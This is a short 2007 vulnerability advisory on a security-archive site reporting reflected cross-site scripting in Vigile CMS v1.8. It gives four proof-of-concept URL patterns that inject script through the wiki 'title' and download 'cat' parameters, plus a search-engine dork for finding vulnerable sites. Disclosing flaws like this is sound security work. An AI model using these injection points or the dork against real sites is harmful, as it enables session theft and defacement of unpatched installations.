Vigile CMS v1.8 Multiple Remote XSS Vulnerability

2007-09-21T00:00:00
ID SECURITYVULNS:DOC:18033
Type securityvulns
Reporter Securityvulns
Modified 2007-09-21T00:00:00

Description

Name : Vigile CMS v1.8 Multiple Remote XSS Vulnerability

Download : http://www.itcms.it/

Date : 20-09-2007

Author : x0kster

Mail : x0kster@gmail.com

Note : For works, the wiki or the download module must be installed in the site.

PoCs :

Wiki 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&title=[XSS]

Wiki 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[WIKINAME]?title=[XSS]

Download 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[DOWNLOADNAME]&cat=[XSS]

Download 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[DOWNLOADNAME]/cat=[XSS]

Dork : "tutti i contenuti, notizie, e commenti sono anche opera degli utenti, ogni violazione sarа eliminata dietro segnalazione."